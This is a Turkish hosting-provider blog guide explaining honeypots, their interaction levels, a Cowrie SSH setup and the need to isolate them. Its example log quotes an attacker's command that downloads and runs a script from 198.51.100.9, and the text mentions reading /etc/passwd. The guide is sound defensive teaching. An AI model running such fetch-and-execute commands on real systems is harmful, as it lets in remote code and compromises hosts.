Güvenlik & SSL

    Honeypot Nedir? Saldırganları Tuzağa Çekmek

    Honeypot tuzak sistemlerinin nasıl çalıştığını, saldırı istihbaratı topladığını ve türlerini anlatan rehber.

    12 dk okuma Güncellendi: 10 Temmuz 2026

    Sunucu güvenliğinde çoğu araç savunma amaçlıdır; güvenlik duvarı kapıyı kapatır, WAF gelen trafiği süzer, yedekleme en kötü ihtimale karşı sizi ayakta tutar. Honeypot ise bambaşka bir mantıkla çalışır: saldırganı savuşturmaya değil, onu kasıtlı olarak kendine çekip davranışını gözlemlemeye yarar. Türkçede "bal küpü" olarak da geçen bu yaklaşım, adını arıları çeken tatlı tuzaktan alır. Görünüşte savunmasız, kolay avlanabilir bir hedef sunarsınız; saldırgan bu sahte hedefe saldırdığında ise ne yaptığını, hangi araçları kullandığını ve nereden geldiğini dakikası dakikasına kaydedersiniz.

    Bu yazıda bir kıdemli sistem yöneticisinin gözünden honeypot kavramını baştan sona ele alacağız. Ne işe yaradığını, düşük ve yüksek etkileşimli türler arasındaki farkı, üretim ve araştırma amaçlı kullanımların nasıl ayrıştığını, hangi verilerin toplandığını ve en önemlisi yanlış kurulan bir honeypot'un nasıl kendi ağınızı bir sıçrama tahtasına dönüştürebileceğini somut örneklerle anlatacağız. Amaç, honeypot'u "havalı bir güvenlik oyuncağı" olmaktan çıkarıp, ne zaman değerli ne zaman tehlikeli olduğunu netleştirmek.

    Honeypot Tam Olarak Nedir?#

    Honeypot, tek amacı saldırıya uğramak olan bir tuzak sistemdir. Gerçek bir iş yükü taşımaz, gerçek kullanıcıya hizmet vermez ve meşru trafik almaması gerekir. Tam da bu yüzden çok güçlü bir sinyal üretir: honeypot'a dokunan hemen herkes, tanım gereği, orada olmaması gereken biridir. Üretim sunucularınızda günde binlerce meşru istek arasında bir saldırıyı ayıklamak samanlıkta iğne aramaya benzerken, honeypot'ta gelen her paket şüphelidir. Bu, güvenlik ekiplerinin en büyük derdi olan "gürültü içinde sinyali bulma" problemini kökten sadeleştirir.

    Bir honeypot, sahte bir SSH sunucusu kadar basit ya da içinde uydurma veritabanları, sahte kullanıcı hesapları ve gerçekçi dosya sistemleri barındıran koca bir sanal ağ kadar karmaşık olabilir. Ortak nokta şudur: sistem, saldırgana "burada değerli bir şey var ve zayıf korunuyor" hissi verecek şekilde tasarlanır. Saldırgan içeri girmeye çalıştığında her adımı loglanır. Böylece hangi kullanıcı adı ve parola kombinasyonlarının denendiğini, hangi zafiyetin sömürülmeye çalışıldığını, içeri girildikten sonra hangi komutların çalıştırıldığını ve indirilmeye çalışılan zararlı yazılımın ne olduğunu birinci elden görürsünüz.

    Honeypot Nasıl Çalışır?#

    Temel çalışma prensibi "sahte ama inandırıcı bir hizmet sunmak ve her etkileşimi kaydetmek" üzerine kuruludur. Diyelim ki 22 numaralı porttan sahte bir SSH servisi yayınladınız. Bu servis gerçek bir kabuk çalıştırmaz; sadece bir SSH sunucusuymuş gibi davranır, parola sorar, denenen bilgileri kaydeder ve saldırgana sahte bir dosya sistemi gösterir. Saldırgan ls, wget, cat /etc/passwd gibi komutlar yazar; sistem bu komutlara uydurma ama tutarlı yanıtlar verir. Saldırgan gerçek bir sunucuya girdiğini sanırken siz oturumun tamamının video kaydını almış olursunuz.

    İnandırıcılık burada kritik. Deneyimli bir saldırgan, karşısındakinin bir tuzak olduğunu fark ederse (buna "honeypot parmak izi" veya fingerprinting denir) hemen çekilir ve elinizde işe yarar veri kalmaz. Bu yüzden iyi bir honeypot, gerçek bir servisin banner'larını, gecikme sürelerini ve hata mesajlarını taklit etmeye özen gösterir. Örneğin bir web honeypot'u, çok bilinen bir CMS'in giriş sayfasını birebir kopyalar ama arka planda hiçbir gerçek veriye erişim vermez. Saldırgan formu doldurup denemeye başladığı anda, denediği her yük (payload) kayda geçer.

    Aşağıda, bir web honeypot'unun neyi taklit ettiğini anlamak için basit bir Nginx yönlendirme mantığı görüyorsunuz. Gerçek uygulamanız app bloğunda dururken, sık taranan yönetim yollarını ayrı bir tuzak servise gönderirsiniz:

    server {
        listen 80;
        server_name example.com;
    
        # Gercek uygulama
        location / {
            proxy_pass http://app_backend;
        }
    
        # Sik taranan yonetim yollari tuzaga gider
        location ~* ^/(wp-admin|phpmyadmin|\.env|admin|xmlrpc\.php) {
            access_log /var/log/nginx/honeypot.log honeypot_fmt;
            proxy_pass http://honeypot_backend;
        }
    }
    

    Buradaki mantık şu: hiçbir meşru kullanıcı sizin uygulamanızda /phpmyadmin veya /.env yolunu istemez. O yolları isteyen biri, otomatik bir tarayıcı ya da saldırgandır. İsteği bir tuzağa yönlendirip loglayarak, üretim uygulamanızı riske atmadan istihbarat toplarsınız. Sunucu güvenliğinin genel çerçevesini sunucu güvenliği temelleri yazımızda ayrıca ele alıyoruz.

    Etkileşim Seviyesine Göre Türler#

    Honeypot'ları sınıflandırmanın en kullanışlı yolu, saldırgana ne kadar "oynama alanı" tanıdıklarına bakmaktır. Bu, hem toplanan verinin zenginliğini hem de taşınan riski doğrudan belirler.

    Düşük etkileşimli honeypot, yalnızca birkaç servisi yüzeysel olarak taklit eder. Gerçek bir işletim sistemi ya da kabuk sunmaz; sadece bağlantıyı kabul eder, banner gösterir ve denenen kimlik bilgilerini kaydeder. Kurulumu kolay, bakımı düşük ve riski neredeyse yoktur çünkü saldırganın ele geçirebileceği gerçek bir sistem yoktur. Karşılığında topladığı veri sınırlıdır: kimin ne denediğini görürsünüz ama saldırganın içeri girdikten sonra ne yapacağını göremezsiniz.

    Yüksek etkileşimli honeypot, gerçek bir işletim sistemi ve gerçek servisler sunar. Saldırgan gerçekten içeri girer, gerçekten komut çalıştırır. Bu, çok daha zengin istihbarat verir; sıfırıncı gün istismarlarını, yeni zararlı yazılım örneklerini ve saldırganın tam taktiğini görebilirsiniz. Ama aynı ölçüde risklidir: saldırgan gerçek bir makineyi ele geçirmiştir ve dikkatli izole edilmezse buradan ağınızın geri kalanına sıçrayabilir. Orta etkileşimli honeypot'lar ise ikisinin arasında durur; sahte ama tutarlı bir kabuk sunar, komutlara mantıklı yanıt verir fakat gerçek bir sistem çalıştırmaz.

    ÖzellikDüşük EtkileşimliOrta EtkileşimliYüksek Etkileşimli
    Taklit derinliğiYüzeysel bannerSahte kabukGerçek işletim sistemi
    Toplanan veriKimlik denemeleriKomut geçmişiTam saldırı zinciri
    Kurulum zorluğuDüşükOrtaYüksek
    Bakım yüküÇok düşükOrtaYüksek
    Ele geçirilme riskiYok denecek kadar azSınırlıCiddi
    Tipik kullanımÜretim, erken uyarıİstihbaratAraştırma, zararlı analizi

    Pratikte çoğu kurum, üretim ortamına düşük veya orta etkileşimli honeypot koyar; yüksek etkileşimlileri ise internetten ve iç ağdan sıkı biçimde izole edilmiş bir araştırma laboratuvarında çalıştırır.

    Amaca Göre Türler: Üretim ve Araştırma#

    Etkileşim seviyesinden ayrı bir eksen daha var: honeypot'u neden kurduğunuz. Bu iki amaç, tasarımı ve yerleşimi tamamen değiştirir.

    Üretim honeypot'ları, günlük operasyonunuzu korumaya yardımcı olmak için kurulur. Amaç derin akademik istihbarat değil, erken uyarıdır. İç ağınıza yerleştirdiğiniz sahte bir dosya sunucusu ya da sahte bir veritabanı, kimse ona dokunmadığı sürece sessiz durur. Birisi ona bağlanmaya çalıştığı anda ise güçlü bir alarm üretir; çünkü meşru hiçbir çalışanın o sisteme erişmesi için sebep yoktur. Bu, özellikle içeri sızmış bir saldırganın ağda yatay hareket ederken (lateral movement) yakalanması için değerlidir. Basit, düşük etkileşimli ve az bakım isteyen bu honeypot'lar, SOC ekiplerinin gözü kulağı olur.

    Araştırma honeypot'ları ise saldırganları ve saldırı tekniklerini incelemek için kurulur. Güvenlik araştırmacıları, üniversiteler ve tehdit istihbaratı ekipleri bunları kullanır. Amaç yeni zararlı yazılım ailelerini yakalamak, botnet davranışını haritalamak ve saldırı trendlerini takip etmektir. Bunlar genellikle yüksek etkileşimlidir, çok fazla veri üretir ve ciddi analiz kapasitesi ister. Bir barındırma sağlayıcısının bakış açısından üretim honeypot'ları çok daha yaygın ve pratiktir; araştırma honeypot'ları ise ayrı bir uzmanlık ve altyapı gerektirir.

    Bir Honeypot ile Hangi Verileri Toplarsınız?#

    Honeypot'un asıl değeri topladığı istihbarattadır. İyi kurgulanmış bir tuzak size şu soruların yanıtını verir: Saldırgan nereden geliyor? Hangi kimlik bilgilerini deniyor? Hangi zafiyeti sömürmeye çalışıyor? İçeri girince ne yapıyor? Toplanan tipik veri kalemleri şunlardır:

    • Kaynak IP adresleri ve coğrafi dağılımları
    • En sık denenen kullanıcı adı ve parola çiftleri
    • Sömürülmeye çalışılan zafiyetler ve gönderilen yükler
    • İçeri girildikten sonra çalıştırılan komut dizileri
    • İndirilmeye çalışılan zararlı yazılım örnekleri ve komuta-kontrol adresleri
    • Saldırının zaman içindeki yoğunluğu ve otomasyon örüntüleri

    Bu veriyi somutlaştırmak için, gerçek bir SSH honeypot'unun ürettiği tarza yakın bir log satırı dizisi düşünün. Aşağıda, denenen zayıf parolaların ne kadar öngörülebilir olduğunu gösteren örnek bir kayıt görüyorsunuz:

    # Ornek honeypot erisim gunlugu (ozetlenmis)
    2026-07-09T02:14:11Z  src=203.0.113.44  user=root      pass=123456     result=fail
    2026-07-09T02:14:12Z  src=203.0.113.44  user=root      pass=admin      result=fail
    2026-07-09T02:14:13Z  src=203.0.113.44  user=root      pass=root       result=accept
    2026-07-09T02:14:19Z  src=203.0.113.44  cmd="uname -a; wget http://198.51.100.9/x.sh"
    2026-07-09T02:14:21Z  src=203.0.113.44  cmd="chmod +x x.sh; ./x.sh"
    

    Bu beş satır bile çok şey anlatır: saldırgan otomatik bir botla en yaygın parolaları sırayla deniyor, "başarılı" olduğunda hemen dışarıdan bir betik indirmeye çalışıyor. Bu betiğin adresi (198.51.100.9) artık sizin engelleme listenize eklenebilecek bir tehdit göstergesidir. İşte honeypot'un ürettiği pratik değer budur. Bu tür saldırgan IP'lerini otomatik engellemek için fail2ban kurulumu yazımızdaki yöntemleri honeypot loglarıyla birleştirebilirsiniz.

    Toplanan bu istihbaratı çoğu zaman merkezî bir veritabanında toplarsınız. Örneğin denenen kimlik bilgilerini basit bir tabloda özetlemek, hangi parola listelerinin dolaşımda olduğunu görmenizi sağlar:

    SELECT username, password, COUNT(*) AS deneme
    FROM honeypot_logins
    WHERE created_at > NOW() - INTERVAL 7 DAY
    GROUP BY username, password
    ORDER BY deneme DESC
    LIMIT 10;
    

    Pratik Kurulum: Sahte Bir SSH Servisi#

    Kavramı yere indirmek için tipik bir kurulum akışına bakalım. Cowrie gibi bilinen bir SSH/Telnet honeypot'u, orta etkileşimli bir tuzak sunar: sahte ama tutarlı bir kabuk verir, komutları kaydeder ama gerçek sisteminize dokundurtmaz. En kritik nokta, honeypot'u gerçek servisinizin portuna değil, saldırganların taradığı standart porta koyup gerçek yönetim erişiminizi başka bir porta almaktır.

    # Gercek SSH yonetimini standart olmayan bir porta tasi
    sudo sed -i 's/^#\?Port 22/Port 2022/' /etc/ssh/sshd_config
    sudo systemctl restart ssh
    
    # Honeypot icin ayri, yetkisiz bir kullanici olustur
    sudo useradd -r -s /usr/sbin/nologin honeypot
    
    # Cowrie'yi kendi izole kullanicisi altinda calistir
    sudo -u honeypot python3 -m venv /opt/cowrie/env
    

    Yapılandırma tarafında honeypot'un dinleyeceği portu ve kaydedeceği bilgileri bir ini dosyasında belirlersiniz. Aşağıdaki örnek, tuzağın 22 numaralı portu dinlemesini ve tüm oturumları kaydetmesini sağlar:

    [ssh]
    enabled = true
    listen_endpoints = tcp:22:interface=0.0.0.0
    
    [output_jsonlog]
    enabled = true
    logfile = /opt/cowrie/var/log/cowrie/cowrie.json
    
    [honeypot]
    hostname = srv-db-prod
    sensor_name = kenar-tuzak-01
    

    Burada hostname değerini bilerek inandırıcı seçtik: srv-db-prod gibi bir isim, saldırgana "önemli bir veritabanı sunucusuna girdim" hissi verir ve onu daha uzun süre etkileşimde tutar. Uzun etkileşim, daha fazla veri demektir. Bu tarz honeypot'ları kendi yönetiminizdeki bir VDS sunucu üzerinde, üretim ortamınızdan ayrı bir makinede çalıştırmak en sağlıklı yaklaşımdır.

    Yanlış Konumlandırmanın Riskleri#

    Şimdi işin en önemli ama en çok atlanan kısmına geldik. Honeypot, kötü kurulduğunda güvenlik aracı olmaktan çıkıp bir yükümlülüğe dönüşür. Özellikle yüksek etkileşimli bir honeypot, tanım gereği ele geçirilmesi beklenen bir sistemdir. Saldırgan içeri girer, sisteme hâkim olur ve eğer o makine ağınızın geri kalanına erişebiliyorsa, tuzağı kuran kişi olarak siz saldırgana çalışan bir sıçrama tahtası hediye etmiş olursunuz. Bir honeypot'un ele geçirilmesi normaldir; asıl felaket, o honeypot'tan iç ağınıza, veritabanlarınıza ya da diğer müşteri sunucularınıza geçilebilmesidir.

    Bu yüzden izolasyon pazarlık konusu değildir. Honeypot ayrı bir ağ segmentinde (VLAN veya ayrı bir sanal ağ) durmalı, iç kaynaklara erişimi güvenlik duvarıyla tamamen kesilmeli ve dışarıya doğru trafiği sıkıca sınırlanmalıdır. Aksi halde ele geçirilen honeypot, sizin IP adresinizden başka hedeflere saldırı başlatabilir; bu da hem yasal sorumluluk hem de IP itibar kaybı demektir. Aşağıdaki gibi giden trafiği kısıtlayan bir kural, ele geçirilen tuzağın başkalarına saldırmasını engellemenin ilk adımıdır:

    # Honeypot'tan ic aga giden her seyi reddet
    sudo iptables -A OUTPUT -s 10.10.99.5 -d 10.0.0.0/8 -j DROP
    sudo iptables -A OUTPUT -s 10.10.99.5 -d 192.168.0.0/16 -j DROP
    
    # Disariya sadece log/istihbarat sunucusuna izin ver
    sudo iptables -A OUTPUT -s 10.10.99.5 -d 10.10.99.10 -p tcp --dport 443 -j ACCEPT
    sudo iptables -A OUTPUT -s 10.10.99.5 -j DROP
    

    İkinci büyük risk yasal ve etik boyuttur. Bazı ülkelerde honeypot ile bilerek saldırganı içeri çekmenin "tuzağa düşürme" (entrapment) tartışması vardır; ayrıca honeypot'ta yakalanan verilerin (IP adresi gibi) kişisel veri sayılabileceği ve KVKK gibi düzenlemelere tabi olabileceği unutulmamalıdır. Üçüncü risk ise bakımsızlıktır: unutulup güncellenmeyen bir honeypot, zamanla kendisi gerçek bir zafiyet kaynağına dönüşebilir. Kurduğunuz her tuzağı envanterinize yazın, izleyin ve amacı bittiğinde kaldırın.

    Honeypot Diğer Savunmaların Yerini Tutar mı?#

    Kısa yanıt: hayır. Honeypot bir katmandır, tek başına bir güvenlik stratejisi değil. Gelen saldırıyı durdurmaz; onu gözlemler. Bu yüzden honeypot'u güvenlik duvarı, WAF, düzenli yedekleme ve güçlü kimlik doğrulama gibi asıl savunma katmanlarının yerine değil, onların üstüne koyarsınız. Aşağıdaki tablo, honeypot'un ekosistemdeki yerini diğer araçlarla kıyaslar.

    AraçAna İşleviSaldırıyı durdurur mu?
    Güvenlik duvarıİzinsiz trafiği engellerEvet
    WAFWeb katmanı saldırılarını süzerEvet
    Fail2banKötü niyetli IP'leri banlarEvet
    HoneypotSaldırgan davranışını izlerHayır, gözlemler
    YedeklemeFelaket sonrası kurtarırHayır, telafi eder

    Gerçek dünyada honeypot'un topladığı istihbarat, diğer katmanları besler. Honeypot'ta yakalanan saldırgan IP'lerini güvenlik duvarınıza engel olarak ekler, sık denenen zafiyet yollarını WAF kurallarınıza eklersiniz. Yani honeypot pasif bir gözlemci gibi görünse de, ürettiği veriyle aktif savunmanızı keskinleştirir. Web uygulamalarınızı gerçekten koruyan katman için WAF çözümleri ve büyük ölçekli saldırılar için DDoS koruma hizmetlerine bakmanızı öneririz.

    Sıkça Sorulan Sorular#

    Honeypot kurmak yasal mı?#

    Kendi altyapınızda, kendi sunucunuz üzerinde honeypot çalıştırmak genel olarak yasaldır çünkü saldırıyı siz başlatmıyorsunuz, size gelen saldırıyı kaydediyorsunuz. Ancak toplanan verilerin (özellikle IP adresleri) kişisel veri kapsamına girebileceğini ve KVKK gibi düzenlemelere uygun saklanması gerektiğini unutmayın. Başkasının ağında ya da izinsiz bir sistemde honeypot çalıştırmak ise ayrı bir hukuki meseledir; her zaman kendi kaynaklarınızda kalın.

    Küçük bir işletme için honeypot şart mı?#

    Hayır, kesinlikle şart değil ve öncelik hiç değil. Küçük bir işletmenin sınırlı zamanı ve bütçesi önce temel güvenlik hijyenine gitmelidir: güçlü parolalar, iki faktörlü doğrulama, güncel yazılımlar, düzenli yedekleme ve bir güvenlik duvarı. Honeypot bunların üstüne eklenen, biraz uzmanlık isteyen ileri bir katmandır. Temelleri sağlamlaştırmadan honeypot kurmak, kapısı açık evin bahçesine alarm koymaya benzer.

    Düşük mü yüksek etkileşimli honeypot seçmeliyim?#

    Amacınıza ve risk toleransınıza bağlıdır. Eğer sadece erken uyarı ve saldırı sinyali istiyorsanız düşük etkileşimli bir honeypot yeterlidir; kurulumu kolaydır, bakımı azdır ve neredeyse hiç risk taşımaz. Yeni zararlı yazılımları ve saldırı tekniklerini derinlemesine incelemek istiyorsanız yüksek etkileşimliye ihtiyacınız olur, ama bunu mutlaka izole edilmiş, üretimden tamamen ayrı bir laboratuvarda çalıştırın. İlk kez kuruyorsanız düşük etkileşimliyle başlamak en güvenli yoldur.

    Honeypot saldırıyı engeller mi?#

    Hayır, honeypot bir engelleme aracı değildir; gözlem ve istihbarat aracıdır. Görevi saldırganı durdurmak değil, davranışını kaydetmektir. Engelleme işini güvenlik duvarı, WAF ve fail2ban gibi araçlar yapar. Ancak honeypot'un topladığı veri bu engelleme araçlarını besler: yakaladığınız saldırgan adreslerini kara listeye ekleyerek pasif gözlemi aktif korumaya dönüştürebilirsiniz.

    Honeypot'un ele geçirilmesi tehlikeli mi?#

    Bir honeypot'un ele geçirilmesi aslında normaldir; zaten bunun için kurulur. Asıl tehlike, ele geçirilen honeypot'un ağınızın geri kalanına erişebilmesidir. Eğer tuzak ayrı bir ağ segmentinde izole edilmişse ve dışarı çıkan trafiği kısıtlanmışsa, saldırgan yalnızca boş bir kutuya girmiş olur. Ama izolasyon eksikse, saldırgan honeypot'u başka sistemlere saldırmak için sıçrama tahtası olarak kullanabilir. Bu yüzden ağ izolasyonu honeypot kurulumunun en kritik parçasıdır.

    Honeypot ile IDS/IPS arasındaki fark nedir?#

    IDS (saldırı tespit sistemi) ve IPS (saldırı önleme sistemi), gerçek trafiğiniz içinde bilinen saldırı imzalarını arar ve çok fazla veri arasında şüpheli olanı ayıklamaya çalışır. Honeypot ise hiç meşru trafik almaması gereken bir tuzaktır, dolayısıyla ona gelen her şey doğal olarak şüphelidir. Bu, honeypot'un çok daha az yanlış alarm üretmesini sağlar. İkisi birbirini tamamlar: IDS/IPS geniş kapsamlı izleme yapar, honeypot ise net ve gürültüsüz bir alarm noktası sunar.

    Kapanış#

    Honeypot, doğru kurulduğunda güvenlik cephaneliğinizin en zarif araçlarından biridir: gürültüsüz, yüksek sinyalli ve saldırgan zihniyetine doğrudan pencere açan bir tuzak. Ama unutmayın ki honeypot bir başlangıç değil, bir ileri adımdır. Önce temel savunma katmanlarınızı sağlamlaştırın, sonra istihbarat için honeypot ekleyin ve her zaman sıkı izolasyonla çalıştırın. Yanlış konumlandırılmış bir tuzak, koruması gereken ağı riske atan bir açık kapıya dönüşebilir.

    Clou.TR olarak güvenliğinizi baştan sona kurgularken yanınızdayız. İzole tuzak ortamlarınızı barındırabileceğiniz VDS sunucu ve sanal sunucu seçeneklerimiz, uygulamalarınızı gerçek zamanlı koruyan WAF ve DDoS koruma çözümlerimiz, üretim ortamınızı ayakta tutan yedekleme hizmetimiz ve uzman ekibimizin sunduğu sunucu yönetimi desteğiyle güvenliğinizi tek elden yönetebilirsiniz. Doğru katmanları doğru sırayla kurgulayalım; siz işinize odaklanın, altyapının güvenliğini bize bırakın.

    Güvenlikİzleme

    Uygulamaya geçmeye hazır mısınız?

    NVMe SSD, ücretsiz SSL ve %99.9 uptime garantisiyle Clou.TR hosting ve sunucu çözümleriyle projenizi hayata geçirin.